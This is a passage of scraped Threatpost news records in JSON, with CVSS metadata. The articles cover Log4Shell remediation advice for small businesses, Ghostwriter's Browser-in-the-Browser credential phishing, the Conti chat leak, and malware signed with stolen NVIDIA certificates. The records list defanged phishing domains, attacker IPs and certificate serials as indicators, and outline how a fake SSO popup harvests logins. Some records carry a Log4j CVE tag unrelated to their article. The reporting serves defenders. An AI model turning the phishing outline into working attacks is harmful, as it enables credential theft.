Likewise, a variety of cybersecurity companies have listed steps that can be taken to harden vulnerable versions of log4j if upgrades can\u2019t be performed readily. Similarly, exploitation of this vulnerability and many others can be caught using typical compromise assessment techniques. It pays to threat hunt! Remediation is no different than recovering from any other type of RCE vulnerability.\n\n**Lacework\u2019s Nunnikhoven:** Remediation of this issue will depend on where you find log4j. If it\u2019s in something you\u2019ve written, you can update the library or turn off the vulnerable feature. For commercial software and services, you\u2019re reliant on the vendor to resolve the issue. While that work is ongoing, monitoring your network for attack attempts is reasonably straightforward\u2026if you have the security controls in place.\n\nLacework Labs has published [a detailed technical post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) on some of the attack techniques currently in use. Expect more variants as cybercriminals develop more techniques to avoid various security controls and other mitigation.\n\nIn situations like this it\u2019s important to understand that until the root cause has been resolved (log4j updated or the feature in question turned off), attackers will continue to work to evade any mitigations that defenders put in place to stop them.\n\n**Anchore\u2019s Bressers:** An organization without an incident-management team on staff should reach out to an incident-management consulting group. There are a number of important steps that should happen when investigating any cybersecurity attack, successful or not, that can require preserving evidence, recovering data, and protecting employees and users. This is a serious vulnerability with serious consequences. 
It\u2019s one of the worst we have seen in recent history because of its ease of exploitability, far-reaching impacts and powerful nature.\n\n## Final Thoughts\n\n**Datto\u2019s Weeks:** Scenarios such as the log4j vulnerability underscore the importance of proactivity in security. While many are now scrambling to address the vulnerability with patches, it\u2019s equally important to plan for subsequent attacks. Fortunately, there are solutions that can apply known workarounds for vulnerable instances.\n\n**HackerOne\u2019s Ockers:** As a best practice, I recommend all businesses have a clear understanding of the software used within their own systems. Even more important for SMBs in this instance \u2014 businesses should also have a clear understanding of the licensing agreements and security policies of any software vendors or service providers. This level of visibility lets security and IT teams quickly understand where they\u2019re at risk if, and when, something like this is exploited.\n\n**ESET\u2019s L\u00e9veill\u00e9:** SMBs should verify if there were any successful attempts to exploit the vulnerability by looking at their logs.\n\n**HackerOne\u2019s Ockers:** SMBs and larger organizations alike will be affected. As we\u2019re seeing, exploitation will continue to be widespread \u2013 this means it\u2019s particularly important that SMBs check if vendors are still using the vulnerable version of log4j to process user-controlled or otherwise untrusted data. And, if so, SMBs should also ask vendors if their data is stored or processed in the same exposed environment.\n\n**Cybereason\u2019s Striem-Amit:** I think at the end of the day, really prioritize the most internet-facing environments, and rely on your service providers as much as they can to assist you with other patching. You\u2019re welcome to use [our vaccine](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) to buy time. 
It does work remarkably well to make sure that, between now and when you actually end up patching the server, you\u2019re kind of secure.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T17:54:47", "type": "threatpost", "title": "What the Log4Shell Bug Means for SMBs: Experts Weigh In", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T17:54:47", "id": "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "href": "https://threatpost.com/log4shell-bug-smbs-experts/177021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-31T18:15:01", "description": "Ghostwriter \u2013 a threat actor previously [linked](<https://www.mandiant.com/resources/unc1151-linked-to-belarus-government>) with the Belarusian Ministry of Defense \u2013 has glommed onto the [recently disclosed](<https://threatpost.com/browser-in-the-browser-attack-makes-phishing-nearly-invisible/179014/>), nearly invisible \u201cBrowser-in-the-Browser\u201d (BitB) credential-phishing technique in order to continue its ongoing [exploitation](<https://threatpost.com/russian-apts-phishing-ukraine-google/178819/>) of the war in Ukraine.\n\nIn a Wednesday [post](<https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/>), Google\u2019s Threat Analysis Group (TAG) said that they\u2019d already spotted BitB being used by multiple government-backed actors prior to the media turning a laser eye on BitB earlier this month. 
The fresh attention was triggered by a penetration tester and security researcher \u2013 who goes by the handle mr.d0x \u2013 who posted a [description](<https://mrd0x.com/browser-in-the-browser-phishing-attack/?no-cache=1>) of BitB.\n\nGhostwriter actors quickly picked up on BitB, combining it with another of the advanced persistent threat\u2019s (APT\u2019s) phishing techniques: namely, hosting credential-phishing landing pages on compromised sites.\n\n## BitB\n\nThe newly disclosed credential-phishing method of BitB takes advantage of third-party single sign-on ([SSO](<https://en.wikipedia.org/wiki/Single_sign-on>)) options embedded on websites that issue popup windows for authentication, such as \u201cSign in with Google,\u201d Facebook, Apple or Microsoft.\n\nThese days, SSO popups are a routine way to authenticate when you sign in.\n\nBut according to mr.d0x\u2019s post, completely fabricating a malicious version of a popup window is a snap: It\u2019s \u201cquite simple\u201d using basic HTML/CSS, the researcher said a few weeks ago. The concocted popups simulate a browser window within the browser, spoofing a legitimate domain and making it possible to stage convincing phishing attacks.\n\n\u201cCombine the window design with an iframe pointing to the malicious server hosting the phishing page, and [it\u2019s] basically indistinguishable,\u201d mr.d0x wrote at the time.\n\nJavaScript can make the window appear on a link, button click or page loading screen. 
As well, libraries \u2013 such as the popular JQuery JavaScript library \u2013 can make the window appear visually appealing.\n\n## BitB Credential Phishing on Compromised Sites\n\nIn Wednesday\u2019s post, TAG gave an example, shown below, of how Ghostwriter has taken to hosting credential phishing landing pages on compromised sites:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/31134025/Ghostwriter_BitB_example-e1648748440308.jpg>)\n\nExample of hosting credential phishing landing pages on compromised sites. Source: TAG.\n\nThe BitB technique shown above entails drawing a login page that appears to be on the passport.i.ua domain, over the page hosted on the compromised site. \u201cOnce a user provides credentials in the dialog, they are posted to an attacker controlled domain,\u201d TAG researchers said.\n\nTAG has recently observed Ghostwriter credential-phishing on these domains:\n\n * login-verification[.]top\n * login-verify[.]top\n * ua-login[.]top\n * secure-ua[.]space\n * secure-ua[.]top\n\n## Other Campaigns Launched by Government-Backed Actors in China, Iran, North Korea & Russia\n\nSince early March, Ghostwriter\u2019s use of BitB is only one of a trio of cyber aggressions that TAG [has been tracking](<https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/>) with regards to Russia\u2019s invasion of Ukraine.\n\nThe use of the war as a lure in phishing and malware campaigns has continued to grow throughout the month, TAG said, with associated cyber-assaults coming in from government-backed actors from China, Iran, North Korea and Russia, as well as from various unattributed groups, according to TAG\u2019s Wednesday post.\n\nActors \u201chave used various Ukraine war-related themes in an effort to get targets to open malicious emails or click malicious links,\u201d TAG said.\n\n## Curious Gorge\n\nBesides Ghostwriter\u2019s BitB campaigns, TAG has spotted a group it\u2019s calling Curious Gorge that it 
attributes to China\u2019s PLA SSF conducting campaigns against government and military organizations in Ukraine, Russia, Kazakhstan and Mongolia.\n\n\u201cWhile this activity largely does not impact Google products, we remain engaged and are providing notifications to victim organizations,\u201d TAG advised.\n\nBelow is a list of IPs used in Curious Gorge campaigns that TAG has recently observed:\n\n * 5.188.108[.]119\n * 91.216.190[.]58\n * 103.27.186[.]23\n * 114.249.31[.]171\n * 45.154.12[.]167\n\n## COLDRIVER\n\nFinally, TAG has also observed COLDRIVER \u2013 a Russia-based threat actor, sometimes referred to as Calisto \u2013 that has launched credential-phishing campaigns targeting several United States-based NGOs and think tanks, the military of a Balkans country, and a Ukraine-based defense contractor.\n\nNow, however, for the first time, COLDRIVER is targeting the military of multiple Eastern European countries and a NATO Centre of Excellence, TAG reported.\n\nGoogle doesn\u2019t know how successful these campaigns have been, given that they were issued from newly created Gmail accounts to non-Google accounts. At any rate, Google hasn\u2019t seen any Gmail accounts successfully compromised because of these campaigns, TAG said.\n\nRecently observed COLDRIVER credential phishing domains:\n\n * protect-link[.]online\n * drive-share[.]live\n * protection-office[.]live\n * proton-viewer[.]com\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-31T18:09:07", "type": "threatpost", "title": "Belarusian \u2018Ghostwriter\u2019 Actor Picks Up BitB for Ukraine-Related Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-31T18:09:07", "id": "THREATPOST:41B10746D1F4B74DA188CB140A8B2676", "href": "https://threatpost.com/belarusian-ghostwriter-actor-picks-up-bitb-for-ukraine-related-attacks/179210/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-28T21:09:30", "description": "The Russia-Ukraine cyber warzone has split the Conti ransomware gang into warring factions, leading to a Ukrainian member 
spilling 60,000 of the group\u2019s internal chat messages online. \n\nOn Monday, vx-underground \u2013 an internet collection of malware source code, samples and papers that\u2019s generally considered to be a benign entity \u2013 [shared](<https://twitter.com/vxunderground/status/1498060366445613056?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1498060366445613056%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.theregister.com%2F2022%2F02%2F28%2Fconti_ransomware_gang_chats_leaked%2F>) on Twitter a message from a Conti member saying that \u201cThis is a friendly heads-up that the Conti gang has just lost all their sh\u2022t.\u201d \n\nThe gang has also, apparently, lost a cache of chat data: the first dump of what the poster promised would be multiple, \u201cvery interesting\u201d leaks coming from Conti\u2019s [Jabber/XMPP](<https://en.wikipedia.org/wiki/XMPP>) server.\n\n\u201cF\u2022ck the Russian government, Glory to Ukraine!\u201d the Conti member, who\u2019s reportedly believed to be Ukrainian, proclaimed. Threatpost advises caution about clicking on any links provided in social media messages: They are, after all, provided by a ransomware group and should be treated with kid gloves.\n\n> Conti ransomware group previously put out a message siding with the Russian government. 
\n> \n> Today a Conti member has begun leaking data with the message \"Fuck the Russian government, Glory to Ukraine!\"\n> \n> You can download the leaked Conti data here: <https://t.co/BDzHQU5mgw> [pic.twitter.com/AL7BXnihza](<https://t.co/AL7BXnihza>)\n> \n> \u2014 vx-underground (@vxunderground) [February 27, 2022](<https://twitter.com/vxunderground/status/1498060366445613056?ref_src=twsrc%5Etfw>)\n\nCisco Talos\u2019 Azim Khodjibaev [said](<https://twitter.com/AShukuhi/status/1498066223564738565?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1498066223564738565%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.theregister.com%2F2022%2F02%2F28%2Fconti_ransomware_gang_chats_leaked%2F>) on Sunday that he had verified that the dump does in fact contain conversations between affiliates, administrators and admins, rendered on [Jabber](<https://threatpost.com/attackers-can-exploit-critical-cisco-jabber-flaw-with-one-message/158942/>) instant-messaging accounts. \n\n> looks like the [#conti](<https://twitter.com/hashtag/conti?src=hash&ref_src=twsrc%5Etfw>) leaks of 2022 are indeed chat logs from jabber accounts between affiliates, administrators and admins. Rejoice CTI analysts and data scientists, it is in json form! [#busymonday](<https://twitter.com/hashtag/busymonday?src=hash&ref_src=twsrc%5Etfw>) [pic.twitter.com/DiyqNoymsD](<https://t.co/DiyqNoymsD>)\n> \n> \u2014 Azim Khodjibaev (@AShukuhi) [February 27, 2022](<https://twitter.com/AShukuhi/status/1498066223564738565?ref_src=twsrc%5Etfw>)\n\nThe conversations date back 13 months, from Jan. 29, 2021 to yesterday, Feb. 27, 2022. \n\nThe first dump contains 339 JSON files, with each file representing a full day\u2019s log. Cybersecurity firm IntelligenceX has posted the spilled conversations [here](<https://intelx.io/?did=51fbf19b-91f5-4d2d-b4e7-504477ebe916>). Many of the messages are written in a Cyrillic-scripted language that appears, at least according to Google Translate, to be Russian. 
\n\n## The Perhaps-Less-Than-100% Russian Conti\n\nConti, a Russia-based extortionist gang, is considered to be as ruthless as it is [sophisticated](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>): It was the first professional-grade ransomware group to weaponize Log4j2. \n\nOn Friday, Conti sided with Russia, pledging \u201cfull support\u201d for President Vladimir Putin\u2019s invasion of Ukraine.\n\n\u201cWARNING,\u201d Conti [blared](<https://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion.ly/>) on its blog, threatening to use its \u201cfull capacity\u201d to retaliate in the face of \u201cWestern warmongers attempt to target critical infrastructure in Russia or any Russian-speaking region of the world.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/28150130/Conti-screenshot-e1646078556143.png>)\n\nConti blog pledge to support Russia\u2019s invasion of Ukraine. Source: Conti blog.\n\n## Cyberattacks Coming at and From Russia\n\nThe split-Conti story is just one of a myriad of cybersecurity headlines coming out of the siege of Ukraine. 
Some other events in the cyberwar that are rocking the security world:\n\n[Russia appears to deploy digital defenses after DDoS attacks](<https://therecord.media/russia-appears-to-deploy-digital-defenses-after-ddos-attacks/>)\n\n[Anonymous Declares \u2018Cyberwar\u2019 on Russia and Pledges Support for Ukraine](<https://heimdalsecurity.com/blog/anonymous-declares-cyberwar-on-russia-and-pledges-support-for-ukraine/>)\n\n[Anonymous breached the internal network of Belarusian railways](<https://securityaffairs.co/wordpress/128486/hacktivism/anonymous-breached-belarusian-railways.html?utm_source=feedly&utm_medium=rss&utm_campaign=anonymous-breached-belarusian-railways>)\n\n[Ukraine: Volunteer IT Army is going to hit tens of Russian targets from this list](<https://securityaffairs.co/wordpress/128464/cyber-warfare-2/ukraine-volunteer-it-army-targets-russia.html?utm_source=feedly&utm_medium=rss&utm_campaign=ukraine-volunteer-it-army-targets-russia>)\n\nRichard Fleeman, vice president of penetration testing ops at cybersecurity advisory services provider Coalfire, told Threatpost on Monday that collective groups such as Anonymous claim to be hacktivists, meaning they don\u2019t attack for personal gain, but rather that they seek to spread their ideology and wage cyberwarfare against those that don\u2019t align. \n\n\u201cThese kinds of activities ebb and flow based on geopolitical events or collective objectives of these groups,\u201d he said. This isn\u2019t new, but they\u2019ll likely escalate \u201camidst the global chaos to target various countries, government agencies, and corporations.\u201d\n\n\u201cThese groups thrive on sentiment and will likely continue to build momentum based on their objectives,\u201d Fleeman observed. \n\nThe muddle of war can also obscure false flag or false information campaigns that target, influence or mislead others, he said. 
\u201cThis can be accomplished in a variety of ways, for example, China compromising Russian technology and targeting other nations through the compromised infrastructure to hide the origins of their attacks or embedding Russian language or terms into source code of malware would aid in the hiding [of] the true origin.\u201d\n\nHe urged that situational awareness be elevated and that security teams \u201cbe vigilant, remain alert, and leverage their security mechanisms in place to identify threats and mitigate them in a fluid manner.\u201d\n\n## The Lure of War to Cyber Actors \n\nCasey Ellis, founder and CTO at crowdsourced cybersecurity provider [Bugcrowd](<https://bugcrowd.com/>), told Threatpost on Monday that the bloodless nature of cyber combat makes it tough to predict who\u2019ll enter this conflict and how. \n\n\u201cThe fact that a lot of unrelated but concerned actors have entered the conflict is unsurprising,\u201d he noted via email. \u201cAnonymous, for example, is well-known for having a principled position on topics and then acting or retaliating via the Internet.\u201d\n\nHis primary concern: \u201cthe relative difficulty of attribution in cyberattacks, as well as the possibility of incorrect attribution or even an intentional false flag operation escalating the conflict internationally.\u201d\n\nRussia will likely avoid provoking the United States \u201cuntil it\u2019s tactically or strategically advantageous for them to do so, which we all hope we can avoid,\u201d he noted. Last week, the White House denied considering [plans](<https://threatpost.com/white-house-denies-mulling-massive-cyberattacks-against-russia/178658/>) to launch massive cyberattacks against Russia in order to cut off its ability to pursue its military aggression \u2013 denials made in spite of NBC News quoting multiple sources to the contrary. 
\n\n\u201cHaving said that, the backdrop of conflict and the openness of the Internet provide greater than normal levels of \u2018aircover\u2019 and background noise for cybercriminals, as well as other nation-states looking to plant a false flag,\u201d Ellis said.\n\nJohn Bambenek, principal threat hunter at digital IT and security operations company [Netenrich](<https://netenrich.com/>), told Threatpost via email that it\u2019s the wild west out there: Traditional actors are using sabotage and DDoS related to military objectives, he observed, while others \u201cwill use the fog of war (quite literally) to take advantage. No one has to commit front line infantry if they want to take advantage anymore,\u201d he said.\n\nExpect a pig pile, he predicted: \u201cUsually for conflicts in that region, other non-state regional actors will engage, either due to patriotism or opportunism. Now that more nations are developing this capability, more are coming to play. And there is no better training ground for nation-state actors than playing in an active warzone.\u201d \n\nWhat does that mean for security teams in the United States and other western countries? It depends on what the West does, he said. \u201cIf we get involved militarily, then the scope of attacks will increase to those nations as well. 
If it is targeted sanctions, likely attacks will focus on those in the chain of enforcement.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-28T21:00:32", "type": "threatpost", "title": "Ukraine-Russia Cyber Warzone Splits Cyber Underground", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-28T21:00:32", "id": "THREATPOST:BDCC3D007E103708BD7CA085B29EF2CB", "href": "https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T21:13:09", "description": "Two of NVIDIA\u2019s code-signing certificates were part of the Feb. 23 Lapsus$ Group ransomware attack the company suffered \u2013 certificates that are now being used to sign malware so malicious programs can slide past security safeguards on Windows machines.\n\nThe Feb. 
23 attack saw 1TB of data bleed from the graphics processing units (GPUs) maker: a haul that included data on hardware schematics, firmware, drivers, email accounts and password hashes for more than 71,000 employees, and more.\n\nSecurity researchers [noted](<https://twitter.com/cyb3rops/status/1499514240008437762>) last week that malicious binaries were being signed with the stolen certificates to come off like legitimate NVIDIA programs, and that they had appeared in the malware sample database VirusTotal.\n\nThe signed binaries were detected as [Mimikatz](<https://threatpost.com/nefilim-ransomware-ghost-account/163341/>) \u2013 a tool for lateral movement that allows attackers to enumerate and view the credentials stored on the system \u2013 and for other malware and hacking tools, including [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) beacons, backdoors and remote access trojans (RATs) (including a [Quasar RAT](<https://threatpost.com/chinese-spy-group-malware-loaders/145093/>) [[VirusTotal](<https://www.virustotal.com/gui/file/065077fa74c211adf9563f00e57b5daf9594e72cea15b1c470d41b756c3b87e1>)] and a Windows driver [[VirusTotal](<https://www.virustotal.com/gui/file/2f578cb0d97498b3482876c2f356035e3365e2c492e10513ff4e4159eebc44b8/detection>)]).\n\n> Gist that contains [@virustotal](<https://twitter.com/virustotal?ref_src=twsrc%5Etfw>) Enterprise search queries to find samples signed with the leaked NVIDIA certificates[#NvidiaLeaks](<https://twitter.com/hashtag/NvidiaLeaks?src=hash&ref_src=twsrc%5Etfw>) [#LAPSUS](<https://twitter.com/hashtag/LAPSUS?src=hash&ref_src=twsrc%5Etfw>)\n> \n> based on my and [@GossiTheDog](<https://twitter.com/GossiTheDog?ref_src=twsrc%5Etfw>)'s work \n<https://t.co/JxnbrLSjVz> [pic.twitter.com/KYRKdYcF8R](<https://t.co/KYRKdYcF8R>)\n> \n> \u2014 Florian Roth \u26a1\ufe0f (@cyb3rops) [March 5, 2022](<https://twitter.com/cyb3rops/status/1500091665595387909?ref_src=twsrc%5Etfw>)\n\n## Expired But Still 
Recognized Certs: A \u2018Significant Threat\u2019\n\nBoth of the stolen NVIDIA code-signing certificates are expired, but they\u2019re still recognized by Windows, which allows a driver signed with the certificates to be loaded in the operating system, according to [reports](<https://www.bleepingcomputer.com/news/security/malware-now-using-nvidias-stolen-code-signing-certificates/>).\n\nAccording to security researchers [Kevin Beaumont](<https://twitter.com/GossiTheDog>) and [Will Dormann](<https://twitter.com/wdormann>), the stolen certificates use these serial numbers:\n\n * 43BB437D609866286DD839E1D00309F5\n * 14781bc862e8dc503a559346f5dcc518\n\nCasey Bisson, head of product and developer relations at code-security product provider BluBracket, called the certificate theft a \u201csignificant threat.\u201d\n\n\u201cSigning certificates are the keys computers use to verify trust in software,\u201d he told Threatpost via email on Monday. \u201cValidating code signatures is a critical step in securing the global code supply chain, and it protects everybody from average consumers running Windows Updates (where signatures are validated automatically) to developers using software components in larger projects (where signatures are hopefully checked as part of the CI process).\u201d\n\nMike Parkin, senior technical engineer at enterprise cyber risk remediation provider Vulcan Cyber, agreed that malware authors being able to use legitimate certificates to sign their code \u201ccan have far-reaching consequences.\u201d\n\nThe dire situation is somewhat mitigated due to the stolen certificates having expired, he said in an email on Monday, but that\u2019s not a perfect solution. 
\u201cThis will make it easier for anti-malware applications to identify malicious code signed with these certs, but there is still the challenge of Microsoft\u2019s operating systems accepting them as valid even past their expiration,\u201d he said.\n\n## Supply Chain\n\nBisson noted that given NVIDIA\u2019s massive install base \u2013 its technology shows up everywhere from gaming to crypto miners to industrial and scientific super-computing \u2013 a supply chain attack targeting users could have \u201cenormous implications.\u201d\n\nHe pointed to global power consumption as one yardstick of how NVIDIA\u2019s hardware is slathered across the world: \u201cSome estimates peg crypto as consuming over half a percent of the world\u2019s annual electric generation on its own,\u201d he said, \u201cmost of that related to power-hungry Nvidia processors dependent on Nvidia\u2019s software signed by these keys.\u201d\n\nNVIDIA\u2019s hardware is critical for gaming and media production, as well as cloud-based artificial intelligence (AI) and machine-learning (ML) that powers everything from voice assistants, image and video processing (including automated moderation), and manufacturing quality control systems, Bisson pointed out.\n\nHe suggested that the fix for supply-chain threats is to establish a new chain of trust in NVIDIA\u2019s software development workflow with new certificates. \u201cUpstream certificate authorities can revoke Nvidia\u2019s old certificates to block installation of any potentially compromised software with those certificates,\u201d he explained. 
\u201cAs always, intrusion detection and access control audits are critical to preventing new intrusion attacks, while enforcing signed commits and continuous automated code scanning for secrets, dependency vulnerabilities, along with manual testing are solid steps to ensuring the security of their software.\u201d\n\n## How to Block the Signed Malware\n\nDavid Weston, director of enterprise and OS security at Microsoft, [tweeted](<https://twitter.com/dwizzzleMSFT/status/1499527802382471188?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1499527802382471188%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Fmalware-now-using-nvidias-stolen-code-signing-certificates%2F>) on Thursday that admins can keep Windows from loading known, vulnerable drivers by configuring [Windows Defender Application Control policies](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/select-types-of-rules-to-create>) to control which of NVIDIA\u2019s drivers can be loaded.\n\nThat should, in fact, be admins\u2019 first choice, he wrote.\n\n> WDAC policies work on both 10-11 with no hardware requirements down to the home SKU despite some FUD misinformation i have seen so it should be your first choice. 
Create a policy with the Wizard and then add a deny rule or allow specific versions of Nvidia if you need\n> \n> \u2014 David Weston (DWIZZZLE) (@dwizzzleMSFT) [March 3, 2022](<https://twitter.com/dwizzzleMSFT/status/1499527802382471188?ref_src=twsrc%5Etfw>)\n\nDavid Weston, Microsoft vice president for OS Security and Enterprise, went on to [tweet](<https://twitter.com/dwizzzleMSFT/status/1499528020410781710>) the attributes to be blocked or allowed.\n\n> These are all the attributes you can block or allow on: [pic.twitter.com/3BV3QoMuMX](<https://t.co/3BV3QoMuMX>)\n> \n> \u2014 David Weston (DWIZZZLE) (@dwizzzleMSFT) [March 3, 2022](<https://twitter.com/dwizzzleMSFT/status/1499528020410781710?ref_src=twsrc%5Etfw>)\n\nUnfortunately, Microsoft\u2019s WDAC fix isn\u2019t a practical solution for the majority of Windows users, who aren\u2019t technically literate, Vulcan Cyber\u2019s Parkin pointed out.\n\nA better approach would be for Microsoft to recognize the certificates as expired and no longer accept them as legitimate, he told Threatpost.\n\n## Doxxed Emails, Password Hashes & More\n\nOn Feb. 27, Lapsus$ claimed that it had been in NVIDIA\u2019s systems for a week, that the gang isn\u2019t state-sponsored and that it\u2019s \u201cnot into politics AT ALL\u201d \u2013 a clarification that\u2019s apparently important for cybercrooks now that the Russia/Ukraine [cyber war zone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) is burning at fever pitch.\n\nLast Wednesday, March 2, the compromised-email notice site Have I Been Pwned put up an [alert](<https://haveibeenpwned.com/PwnedWebsites#NVIDIA>) regarding 71,335 NVIDIA employees\u2019 emails and NTLM password hashes having been leaked on Feb. 
23, \u201cmany of which were subsequently cracked and circulated within the hacking community.\u201d\n\nAs has been [noted](<https://www.theverge.com/2022/3/4/22962217/nvidia-hack-lapsus-have-i-been-pwned-email-breach-password>), at least on the face of it, that number of 71,000 compromised employee accounts \u2013 a number that the graphics processing units maker hasn\u2019t confirmed or denied \u2013 doesn\u2019t make sense. In its most recent quarterly report ([PDF](<https://s22.q4cdn.com/364334381/files/doc_downloads/2021/04/2021-Annual-Review.pdf>)), NVIDIA only listed a workforce of 18,975.\n\nBut, given that the Telegraph\u2019s initial [report](<https://www.telegraph.co.uk/business/2022/02/25/us-microchip-powerhouse-nvidia-hit-cyber-attack/>) cited an insider who said that the intrusion \u201ccompletely compromised\u201d the company\u2019s internal systems, it could be that the stolen data included former employees.\n\nLapsus$ released a portion of the highly confidential stolen data, including source codes, GPU drivers and documentation on NVIDIA\u2019s fast logic controller product, also known as Falcon and Lite Hash Rate, or LHR GPU.\n\nLapsus$ demanded $1 million and a percentage of an unspecified fee from NVIDIA for the Lite Hash Rate bypass.\n\nLapsus$ also demanded that NVIDIA open-source its drivers, lest Lapsus$ do it itself.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/07123426/Lapsus-threat.jpg>)\n\n## Who Is Lapsus$ Group?\n\nLapsus$ Group emerged last year. 
It\u2019s probably best known [for its December attack](<https://www.zdnet.com/article/brazilian-ministry-of-health-suffers-cyberattack-and-covid-19-vaccination-data-vanishes/>) on the Brazil Ministry of Health that took down several online entities, successfully wiping out information on citizens\u2019 COVID-19 vaccination data as well as disrupting the system that issues digital vaccination certificates.\n\nIn January, Lapsus$ also [crippled](<https://threatpost.com/portuguese-media-giant-impresa-ransomware/177323/>) the Portuguese media giant Impresa.\n\nLapsus$ also recently released what is purportedly a [massive dump](<https://betanews.com/2022/03/06/lapsus-hackers-leak-samsung-source-code-and-massive-data-dump-from-security-breach/>) of proprietary source code [stolen](<https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/>) from Samsung, vx-underground [reported](<https://twitter.com/vxunderground/status/1499882337957515274>).\n\n030722 16:06 UPDATE: Added commentary from Casey Bisson and Mike Parkin.\n\n_Register Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** scheduled for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. 
